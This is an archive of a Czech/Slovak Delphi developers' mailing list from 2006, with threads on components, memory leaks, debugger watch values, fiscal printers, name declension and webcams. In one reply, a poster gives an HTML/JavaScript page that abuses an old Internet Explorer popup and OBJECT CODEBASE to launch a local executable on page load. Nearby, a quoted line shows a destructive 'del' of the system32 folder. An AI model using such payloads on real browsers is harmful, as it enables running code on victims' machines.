Kopie (asi bohuzel) je TSringField - jesti neni zde error?, po "=" jsou "???", ale

V app mam jeste moznost provedeni nahledu pomoci TWebBrowseru, a zde pri
konstrukci nahledu :

pomoc:=datamekra.vyrobkyPOPIS.Value;
kde: var pomoc,retez:WideString ;

je pri krokovani hodnota value jeste OK, ale po prirazeni jsou jiz zde milovany "?"

Kde delam asibku?
D7,XP
Prijemny zbytek dne
Vasek Zaruba
8^)

Hledani komponent v dynamickem TForm

[*] Lauko Stefan, Insypo <lauko(zv)insypo.sk> - 11.5.2006 14:49:31

> [...]
> jak to mam udelat? Jak to mam nadefinovat v te procedure? Neco ve smyslu
> for i := 0 to SenderForm.controlcounts-1 ...

namiesto Controls pouzi Components

for n:=0 to ComponentCount-1 do
begin
if (Components[n] is TButton) then TButton(Components[n]).onClick :=
MojClickProc;

Tisk na fiskalni tiskarne EPSON

[*] delphi(zv)mjsoft(tec)cz - 11.5.2006 14:57:31

> No a ty k tomu nemas servisni program, ktery porad ukazuje
> primo probihajici komunikaci a muzes se podivat, co se kam
> posila, kdyz si nejsi jisty?

Bohuzel nemam, dali me jen tiskarnu a k tomu dokumentaci. Zadny program jsem
nedostal. Da se nekde stahnout?

Karel V.

Hledani komponent v dynamickem TForm

[*] Erik Salaj <winsoft(zv)netkosice.sk> - 11.5.2006 15:13:33

> [...]
> jak to mam udelat? Jak to mam nadefinovat v te procedure? Neco ve smyslu
> for i := 0 to SenderForm.controlcounts-1 ...

pozri Components kolekciu:

for i := 0 to ComponentCount - 1 do
if Components[i] is TEdit then

Tisk na fiskalni tiskarne EPSON

[*] Petr Zahradnik <clexpert(zv)clexpert(tec)cz> - 11.5.2006 15:03:32

Puvodni zprava ze dne 11.5.2006:

> Bohuzel nemam, dali me jen tiskarnu a k tomu dokumentaci. Zadny
> program jsem nedostal. Da se nekde stahnout?

To netusim, kontaktuj dodavatele nebo distributora, jestli neco doda.
Ja jako autorizovane servisni stredisko ho mam, ale zrejme nejsem
opravnen ho poskytnout.

Prevod prijmeni do 5. padu

[*] Karel Rys <delphi(zv)zas-me(tec)cz> - 11.5.2006 15:33:35

Pavel Smerk dne 5 May 2006 v 13:13:

> [...]
> si myslel, ze se vic lidi pozastavi nad svym jmenem "o co se proboha
> snazi?", nez kolik zakazniku to zahreje u srdicka.

Uz netusim, pro jake ucely to puvodni tazatel zamyslel, ale stavajicim zakaznikum piseme skutecne
"Vazeny pane Novaku" - od toho 5. pad v cestine je... O automaticke sklonovani se nepokousime,
nektera jmena jsme radi, kdyz vysklonujeme podle prirucek apod. Pokud se nekdo ohradi, mame
alespon moznost osloveni prepsat a priste uz ho nesklonovat (pan Smakal - napsali jsme "Pane
Smakale" a pry ze "on neni zadne Smakale, ale Smakal" :) ). Nemluve o tom, ze nekdo nektere tvary
opravdu povazuje za nevhodne, i kdyz je pravidla pripousteji (Svec: pane Sveci i pane Sevce, coz
zni rekneme hure).

Karel Rys

ako sa uvolnuje pamat obsadena cez interface

[*] brano <odber(zv)centrum.sk> - 11.5.2006 15:09:33

ahoj,

mam
node: IXMLNode;
deklarovane ako atribut nejakej triedy.

v metode tejto triedy je kod asi takyto:

1) node:=GetNode;
2) node:=GetNode;

---
function GetNode: IXMLNode;
var
n: IXMLNode;
begin
n:=NacitajNodeZExistujucehoXmlDokumentu;
Result:=n.CloneNode;
bude po vykonani 2) pamat obsadena v 1) uvolnena?
ak nie, ako ju uvolnit?

watch-chybne zobrazenie hodnoty premennych cyklu

[*] brano <odber(zv)centrum.sk> - 11.5.2006 15:09:33

ahoj,

stane sa mi obcas, mam cyklus napr:

for i := 1 to 31 do
for j := 1 to 4 do

pred cyklom to breaknem, krokujem.
evaluate/modify aj inspect aj watch list zobrazi ako prve hodnoty:
i=31, j=4, hoci v skutocnosti su 1 a 1.

ked som do tela cyklu vlozil riadok:
ShowMessage(IntToStr(i)+','+IntToStr(j));

watch ukazuje spravne hodnoty.
Vie niekto o co ide? da sa s tym nieco robit? vdaka.

watch-chybne zobrazenie hodnoty premennych cyklu

[*] Ludek Finstrle <ludek.finstrle(zv)pzkagis(tec)cz> - 11.5.2006 16:01:37

> [...]
> ShowMessage(IntToStr(i)+','+IntToStr(j));
>
> watch ukazuje spravne hodnoty.
> Vie niekto o co ide? da sa s tym nieco robit? vdaka.

Zkusim kristalovou kouli. Vy ty i a j v cyklu nepouzivate a delphi
kompilator optimalizuje?

Luf

Prevod prijmeni do 5. padu

[*] Petr Zahradnik <clexpert(zv)clexpert(tec)cz> - 11.5.2006 15:59:37

Puvodni zprava ze dne 11.5.2006:

> pan Smakal - napsali jsme "Pane Smakale" a pry ze "on neni zadne
> Smakale, ale Smakal" :)

Jo, to je nejhorsi. Ja jednou volal Kobrovi a rikam mu do telefonu
"pane Kobre" a on nasranej, ze jeho jmeno se nesklonuje a ze je Kobr a
mam mu rikat pane Kobr :-)

Tisk na fiskalni tiskarne EPSON

[*] Martin Burle <mburle2(zv)volny(tec)cz> - 11.5.2006 16:11:38

> Ano, to jsem z manualu take pochopil, ze se ovlada ten fiskal. Ale nevim
> jak to rozchodit. Nejake ESC sekvence jsem tam podle dokumentace posilal,
> ale nic to nedela. Nebyl by ukazkovy kod na par radku.

No jak jsi to posilal, pomoci ceho?

Zkus to takto nejak:

-vytvorit TBlockSerial ze Synaseru, nakonfigurovat, pripojit connect, hw
hanshake, nejvyssi rychlost.

-odeslat esc sekvenci Esc MFB ....Esc MFE tusim sendString

-pokud to ma neco vracet, tak pockat na data, nejaky rozumny timeout,
pomoci waitdata zjistis jestli neco prislo zpet

-vycist data treba do streamu a zpracovat.

No a to nejdulezitejsi nakonec - ta tiskarna musi byt tzv. serializovana a
pro nektere funkce i fiskalizovana. Nova tiskarna by snad mela prijit
serializovana. To se dela pomoci servisniho programu, ktery maji servisni
strediska. Servisni program ma i funkce na overeni jednoduchych tisku,
uctenky atd., tim bych zacal, aby se overilo, ze vubec tiskarna funguje.
Obrat se na vyrobce, mozna ti program poskytnou.

MB

ako sa uvolnuje pamat obsadena cez interface

[*] Ludek Finstrle <ludek.finstrle(zv)pzkagis(tec)cz> - 11.5.2006 16:07:38

> [...]
>
> 1) node:=GetNode;
> 2) node:=GetNode;
>
> bude po vykonani 2) pamat obsadena v 1) uvolnena?

Ano bude, pokud na ten interface neodkazujete i nekde jinde.
Interface si pocita pocet referenci na sebe (coz treba nefunguje
s move). A kdyz dosahne poctu 0, tak se zrusi.

Luf

delphi a problem prace se soubory..

[*] David Kopecek <david.kopecek(zv)hacktrack(tec)com> - 11.5.2006 20:05:56

Caf

KR> Myslim, ze se mi neco podobneho stavalo, kdyz jsem u StringListu pouzival .GetText (protoze jsem
KR> vraceny vysledek pak nerusil). Kdyz se pouzilo .Text, problemy nebyly...

NO zadnou stehle funkcni nepouzivam.. poste to ctu po radcich..
skusel jsem list.clear a hned zatim list.free ale stejnak to
nepomohlo.. postupne se neustale alokuje virtualni pamet a klasicka
pamet taky..

uz nevim co stim jsem z toho zoufalej.. uz sem se tu ptal jednou ale
nikdo mi neodpovedel. copak nikdo neotevira soubory ?..

thx..

SQL - ClientDataSet - LoadFromFile

[*] Jan Rychtar <software(zv)jrsoft(tec)cz> - 11.5.2006 19:19:53

Nevim si rady s importem dat do SQL databaze pres ClientDataSet. Po
pouziti sekvence prikazu:
cdsPT.LoadFromFile('exptit.xml');
cdsPT.ApplyUpdates(0);
se data nactou do datasetu, ale neprovede se ulozeni importovanych dat
do prislusne SQL tabulky.

FreeReport Access violation

[*] Robert Fujak <robof(zv)inmail.sk> - 11.5.2006 19:01:51

vyriesene! tak, chyba bola v neaktivnej sietovej tlaciarni v systeme.
zaujimave, ze do teraz to fungovalo.

S pozdravom
Robert Fujak

> Zdravim.
> Neviete nahodou preco sa mi nedari nainstalovat FreeRep7.dpk?
> Doposial vsetko fungovalo a zrazu zacalo vypisopvat Access violation.
> Skusil som preinstalovat delphi, ale nepomohlo. Dik.

Lokalizator 6

[*] Zbysek Hlinka <konference(zv)hlinka(tec)cz> - 11.5.2006 18:33:49

Ahoj,

tak free verzi jsem vystavil provizorne sem, nez budou predelany stranky
Lokalizatoru. Muzete stahovat co hrdlo raci.

http://www.hlinka(tec)cz/download/localize6.zip

Zdrojaky, slovniky a dalsi veci budou k dispozici take, ale uz za penize.

FreeReport Access violation

[*] Robert Fujak <robof(zv)inmail.sk> - 11.5.2006 18:17:48

[...]

D7Ent, WXPProf
S pozdravom
Robert Fujak

delphi a problem prace se soubory..

[*] Karel Rys <delphi(zv)zas-me(tec)cz> - 11.5.2006 17:43:45

David Kopecek dne 11 May 2006 v 17:35:

> [...]

vraceny vysledek pak nerusil). Kdyz se pouzilo .Text, problemy nebyly...

[*] David Kopecek <david.kopecek(zv)hacktrack(tec)com> - 11.5.2006 17:35:45

Zdravim konferenci,

mam serverovou aplikaci ktera ve vice vlaknech obshluhuje pripojene
klienty..

a ted problem.. jelikoz klienti ctou soubory z disku .. tak potrebuju
vyresit nejlepsi a nejrychlejsi cteni z disku..

na zacktku sem to kousel s klasickym objektem textfile a metodama,
assignfile, readln atd... jenze obcas se mi stalo ze vlakno spadlo (z
ruznych duvodu) a ten soubor zustal uzamcen..

[...]

Tedka pouzivam Tmemorystream.. ten je po vsech ohledech perfektni ale
neprisel sem na zadny spusob jak znej rychle cist jak snim rychle
pracovat stejne jak u tstringlistu..

Poradil by mi nekdo ??... popripadne staci poradit jak uspesne zit a
funguvoat pri poouziti prvni nebo druhe metody ?

thx David

watch-chybne zobrazenie hodnoty premennych cyklu

[*] Petr Berek <sojokl(zv)seznam(tec)cz> - 11.5.2006 16:07:38

Ahoj,
zkus je pred cyklem zinicializovat.
Petr

On 5/11/06, brano <odber(zv)centrum.sk> wrote:

> [...]
> ShowMessage(IntToStr(i)+','+IntToStr(j));
>
> watch ukazuje spravne hodnoty.
> Vie niekto o co ide? da sa s tym nieco robit? vdaka.

[*] Jaroslav Uher <jarek(zv)iuher(tec)cz> - 11.5.2006 16:49:41

On 11 May 2006 at 15:59, Petr Zahradnik wrote:

> Jo, to je nejhorsi. Ja jednou volal Kobrovi a rikam mu do telefonu
> "pane Kobre" a on nasranej, ze jeho jmeno se nesklonuje a ze je Kobr a
> mam mu rikat pane Kobr :-)

tak to (bohuzel) znam.
Kdyz mne nekdo oslovuje pane Uhere, tak...
Sice nenadavam (jsem slusny clovek), ale 'tise trpim' :-(((

V aplikacich mame pole OSLOVENI, ale jen pro slecna, pani, pan,
Vazeny pan ap. a sklonovani radeji neresime.

Jarek Uher

watch-chybne zobrazenie hodnoty premennych cyklu

[*] Miroslav Suchy <suchy(zv)jplusj(tec)cz> - 11.5.2006 16:15:39

To, myslim, dela optimalizace, kdyz Delphi usoudi,
ze to nicemu nevadi.

Wabi

> [...]
>
> watch ukazuje spravne hodnoty.
> Vie niekto o co ide? da sa s tym nieco robit? vdaka.

watch-chybne zobrazenie hodnoty premennych cyklu

[*] Dalibor Toman <dtoman(zv)fortech(tec)cz> - 11.5.2006 16:15:39

On Thursday, May 11, 2006 3:09 PM ,
> [...]

> ShowMessage(IntToStr(i)+','+IntToStr(j));
>
> watch ukazuje spravne hodnoty.
> Vie niekto o co ide? da sa s tym nieco robit? vdaka.

Resilo se to v tomto foru jiz nekolikrat.
Diky optimalizaci se muze stat, ze ridici promenne cyklu pujdou od
nejvyssi hodnoty k nejnizsi apod. Netreba se strachovat - v mistech
kde se promenna pouzije (jako index do pole napriklad) kompilator
pouzije namisto pricitani k offsetu odecitani. Vysledkem techto kejklu
je rychlejsi pruchod cyklu.

Po vypnuti optimalizace kodu by se chovani melo zmenit.

Zdravi
Dalibor Toman

stringgrid ako parameter funkcie

[*] Martin Kasman <mdelphi(zv)centrum.sk> - 11.5.2006 21:26:01

Potrebujem funkcii poslat cely StringGrid.
Nechcem toto: MojaFunkcia(VAR StringGrid: TStringGrid); ale MojaFunkcia(StringGrid: TStringGrid);
Funkcia bude volat sama seba ale chcem, aby vzdy pracovala len so svojim StringGridom. Bude to fungovat? Neposlem funkcie tymto sposobom len pointer na StringGrid? Nemam StringGrid zakazdym vytvorit vo funkcii?

Vdaka za kazdu radu.

delphi a problem prace se soubory..

[*] Petr Langer <p.langer(zv)nexnet(tec)cz> - 11.5.2006 23:02:08

Ahoj,
to ti ani MemProof nerekl, odkud se to alokuje?

pl

David Kopecek wrote:

> uz nevim co stim jsem z toho zoufalej.. uz sem se tu ptal jednou ale
> nikdo mi neodpovedel. copak nikdo neotevira soubory ?..
>
> thx..

delphi a problem prace se soubory..

[*] David Kopecek <david.kopecek(zv)hacktrack(tec)com> - 12.5.2006 00:10:13

Caf

PL> to ti ani MemProof nerekl, odkud se to alokuje?

PL> pl

zdar tak sem nahodil memproof ..prefektini vecicka

ale uz behem kratkeho pusobeni

to ma 4411 live pointers o veliskosti 150967 a postupne to nabyva

a kdyz se podivam do sekce Virtual memory

tak mi to neustale haze VirtualAlloc a ruznou veliskot.
a pise mi to ze mam volat virtualfree.. takze to mam chapat ze se pres
tmemorystream a nebo tstring list alokuje pamet ktera se pak
neuvolnuje

a pak by me zajimalo jak tu aplikaci spojit s .map souborem aby mi to
ukazlovalo unit,a radek

thx david

Jeste k registraci D7

Spatne zpravy: crack ktery jsem dostal od Ludka je jen pro D6. Podle informace z Borlandu neregistrovana verze jde spustit jen jeden mesic.
Dobra zprava: na programech se nijak neprojevi ze byly vytvoreny pod neregistrovanou verzi D7.
Nejlepsi zprava: v Borlandu cz jsou velice vstricni, legalni re-registrace byla vyrizena behem nekolika hodin.
RNDr Z.Kalhous
ToWare s.r.o.
kalhous(zv)eu(tec)cz
tel.:466 614 024

delphi a problem prace se soubory..

[*] radek_456 radek_456 <radek 456(zv)seznam(tec)cz> - 12.5.2006 07:16:43

na problemy s neuvolnenou pameti je nejlepsi pouzit tohle:

http://sourceforge.net/projects/fastmm/

po ukonceni programu ti to vypise kde ti co zustalo neuvolneno

Radek

Jeste k registraci D7

[*] Karel Kral <kralkonf(zv)purusmeda(tec)cz> - 12.5.2006 07:38:45

Ja pouzivam D7 neregistrovane (ale legalni) uz rok. Staci dojit v
registraci az k tomu kroku, kdy to chce opravdu registrovat a pak dat
"Register later".

Kalhous napsal(a):
> [...]
> tel.:466 614 024

Karel Kral, reditel IT / IT manager
PURUS-MEDA, s.r.o., Palackeho 174, 621 00 Brno, CZ

[*] Milos J. Hrach <delphi konf(zv)post(tec)cz> - 12.5.2006 07:56:46

Vyresil bych to bud vlastni nebo nekde stazenu knihovnou, ve ktere bych si nadefinoval jednotlive tvary pro vsechny pady od nejbeznejsich jmen.

Jakub

> Ahoj vsichni,
> resil jste nekdo funkci, ktera by umela pravedat prijmeni do 5. padu
> podle pravidel ceske gramatiky. Momentalne mne nenapada jak na to, nebot

SQL - ClientDataSet - LoadFromFile

[*] Martin Burle <mburle2(zv)volny(tec)cz> - 12.5.2006 10:08:58

> [...]
> cdsPT.LoadFromFile('exptit.xml');
> cdsPT.ApplyUpdates(0);
> se data nactou do datasetu, ale neprovede se ulozeni importovanych dat

Zkus pred ulozenim otestovat, zda vubec jsou nejake zmeny k ulozeni na pocet
zmen (changeCount). Kazdy zaznam ma neco jako updatestatus, ktery urcuje jak
se zmeny ulozi (inserted, deleted atp.). Nejsem si ale jist, zda je mozne
updatestatus zmenit, snad ano.

MB

navratova hodnota pri uzavreni formu

[*] Votava <mail(zv)votavasw(tec)com> - 12.5.2006 10:10:58

dobry den,
oteviram form metodou showModal, na nem mam listBox, rad bych zjistil
pri uzavreni formu index listBoxu, pripadne rozlisit, ze byl form
uzavren napr. krizkem, nevim vsak jak toho docilit, uvitam jakekoli
postrceni,

s pozdravem Votava D5Pro WinXPPro

navratova hodnota pri uzavreni formu

[*] Pavel Malinsky <malinsky(zv)pmcom(tec)cz> - 12.5.2006 10:27:00

Ahoj,

> uzavren napr. krizkem, nevim vsak jak toho docilit, uvitam jakekoli
> postrceni,

Formular ma ModalResult. mrCancel, mrOK etc.

if ShowModal = mrCancel then
Zavrel si to krizkem nebo Cancel buttonem.

navratova hodnota pri uzavreni formu

[*] petr palicka <palicka.petr(zv)seznam(tec)cz> - 12.5.2006 10:22:59

Ahoj,

Votava napsal(a):
> [...]
> pri uzavreni formu index listBoxu, pripadne rozlisit, ze byl form
> uzavren napr. krizkem, nevim vsak jak toho docilit, uvitam jakekoli

to, jak byl uzavren form ti rika jeho ModalResult. Na tlacitko "OK"
si nastav hodnotu mrOK a na tlacitko "Storno" si dej mrCancel.
Hodnotu si prectes pred zrusenim formulare primo z toho listboxu.

> s pozdravem Votava D5Pro WinXPPro

Peca

navratova hodnota pri uzavreni formu

[*] Votava <mail(zv)votavasw(tec)com> - 12.5.2006 10:35:01

dekuji za reakce, vyresil jsem to prictenim listIndex k modalResult,

s pozdravem Votava

Votava napsal(a):

> [...]
>pri uzavreni formu index listBoxu, pripadne rozlisit, ze byl form
>uzavren napr. krizkem, nevim vsak jak toho docilit, uvitam jakekoli

[*] Vit Krska <krska(zv)del(tec)cz> - 12.5.2006 10:53:02

pri Close formu zustane form v pameti, tak se na listbox dostanes
Form.ListBox.ItemIndex.

v!tek

> [...]
> pri uzavreni formu index listBoxu, pripadne rozlisit, ze byl form
> uzavren napr. krizkem, nevim vsak jak toho docilit, uvitam jakekoli

ADODataSet a zaokrouhlovani

[*] Tyslic Jiri <jiri.tyslic(zv)opp.tbggroup(tec)com> - 12.5.2006 11:11:04

Preji hezky den,
mam databazi, ve ktere je polozka typu napr. Decimal(5,2). Pokud uzivatel v DBGridu zada hodnotu 12.044 system provede spravne zaokrouhleni na 12.04. Ale pokud zadam 12.045 zaokrouhly se hodnota na 12.04 misto na 12.05. Pravdepodobne se vyuziva tzv. bankovni zaokrouhlovani nekde uvnitr TADODataSetu (pouzivam i TjvMemoryData).
Poradite nekdo kudy z toho co nejelegantneji ven? Pouzivam to v mnoha programech, ktere se pouzivaji pro zapis merenych hodnot :(

Dekuji za kazde nakopnuti

Jirka

ADODataSet a zaokrouhlovani

[*] Tyslic Jiri <jiri.tyslic(zv)opp.tbggroup(tec)com> - 12.5.2006 11:29:05

> [...]
> z toho co nejelegantneji ven? Pouzivam to v mnoha programech,
> ktere se pouzivaji pro zapis merenych hodnot :(

Omlouvam se vsem, byl jsem opet rychlejsi nez me myslenky.
Osetrit se to da samozdrejme v udalostech BeforePost.

Jirka

navratova hodnota pri uzavreni formu

[*] Ludek <konference(zv)sales(tec)cz> - 12.5.2006 12:35:10

From: "Franta Flinta" <jarek2(zv)centrum(tec)cz>> rozumim tomu tak, ze se spusti program z lokalniho disku s nejakym
> [...]
> bezpecnostni dira. kdyz by to slo, jak by bylo hezke mit stranku, ktera
> provede neco na zpusob "del c:\window\system32\*.*"....

IE to opravdu "umi" :

<HTML>
<HEAD>
<TITLE>Otevreni programu kalkulacka</TITLE>
<SCRIPT LANGUAGE="JavaScript">
var oPopup = window.createPopup();
function ukazka()
{
var oPopBody = oPopup.document.body;
oPopBody.innerHTML = '<OBJECT NAME="X" CLASSID="CLSID:11111111-1111-1111-1111-111111111111" CODEBASE="c:/windows/system32/calc.exe"></OBJECT>'
}

</SCRIPT>
</HEAD>
<BODY onload="ukazka();">
Otevreni programu kalkulacka
</BODY>
</HTML>

Jenom jsem tam radeji dal notepad misto del :)))))

A tohle je jenom jeden ze zpusobu, je jich pokud vim nekolik.

Ludek

Delphi a webkamera

[*] delphak(zv)centrum(tec)cz - 15.5.2006 11:10:03

Ahoj, nevite o nejakych free komponentach nebo nejakem jednoduchem zpusobu kterak z delphi pracovat s Webkamerou? Jde o ukladani obrazu z webky na disk v nastavenych casovych intervalech, pripadne z vice webkamer (pripojenych pres USB) soucasne ...

Dik za radu

Delphi a webkamera

[*] campulka <campulka(zv)czas(tec)cz> - 15.5.2006 12:12:07

Pouzivam TVideoCapture:
http://cc.borland.com/Item.aspx?id=19381

Delphi a webkamera

[*] Josef Zvonicek <prosoft(zv)prosoft(tec)cz> - 15.5.2006 12:08:07

> [...]
> kterak z delphi pracovat s Webkamerou? Jde o ukladani obrazu z webky na
> disk v nastavenych casovych intervalech, pripadne z vice webkamer

http://sourceforge.net/projects/dspack/

Webcam a detekce pohybu

[*] delphak(zv)centrum(tec)cz - 15.5.2006 13:16:12

Ahoj, dik za info o grabovani kamery DSPack je fajn. Jeste bych potreboval nejaky tip na relatime detekci pohybu .. staci me detekovat, ze se neco deje ... pokud mozno s nastavtelnou citlivosti (kvuli sumu pri nizsim osvetleni)

Diky

Webcam a detekce pohybu

[*] Martin Pisarik <martin.pisarik(zv)seznam(tec)cz> - 15.5.2006 13:30:13

Co treba pixelovy XOR dvou ruznych snimku.
Kdyz se snimky budou hodne lisit, bude to na vysledku XORu urcite poznat...> -----Original Message-----

Webcam a detekce pohybu

[*] Jiri Vojtek <jiri(zv)vojtek.biz> - 15.5.2006 13:38:13

Podivej se na substitucni filtr - je to ten nejjednodussi system.
Prakticky jde o to, ze vezmes snimek odectes ho od predchoziho a co zbyde je
pohyb :D
J. Vojtek
> [...]
> potreboval nejaky tip na relatime detekci pohybu .. staci me
> detekovat, ze se neco deje ... pokud mozno s nastavtelnou citlivosti

Nahrada za TTreeView

[*] petr palicka <palicka.petr(zv)seznam(tec)cz> - 15.5.2006 15:20:20

Ahoj,

snazim se najit vhodnou nahradu za TTreeView. Narazil jsem na
TVirtualTreeView, ale na prvni pokus se mi tam nepodarilo dostat zadna
data v dobe navrhu. Marne hledam i nejaky priklad v dokumentaci. Jeto
vubec mozne a jak?

Priklad: v klasickem TTreeView mam preddefinovany strom:

+-uzel_1
| +-poduzel_11
+-uzel_2
| +-poduzel_21
| +-poduzel_22
+-uzel_3

Potrebuju neco podobneho, ale s "rozumnym" editorem pro design time -
ten co je v delphi je desnej. A ukladani do dfm v textove podobe.
Original TTreeView si data do dfm uklada binarne. Pdminkou je, abych pri
poklepani mohl odpalit vlastni akci, poznal, z jakeho uzlu / decka to
bylo a aby bylo lze individualne zvyraznit vybrana decka (tucne + barvou).

Dekuji za kazdou radu,

Petr Palicka aka Peca.

VS2005 versus BDS2006 ? Delphi 10 Lite versus D7 ?

[*] Petr Vones <konference(zv)petrvones(tec)net> - 15.5.2006 16:28:26

From: "Ing. Radovan Samudovsky, Gas-Me-Ra s.r.o" <rsamudovsky(zv)gasmera.sk>
> nema niekto prakticke skusenosti a moze porovnat produktivitu prace vo
> VS2005 od Microsoftu versus BDS2006 od Borlandu ? Potrebujem
> vyvijat ..NET aplikacie a neviem pre co sa mam rozhodnut.

To je jednoduche, BDS 2006 nepodporuje vubec .NET 2.0 Framework (ani jako C#
personality) cimz je zbytecne to dale srovnavat.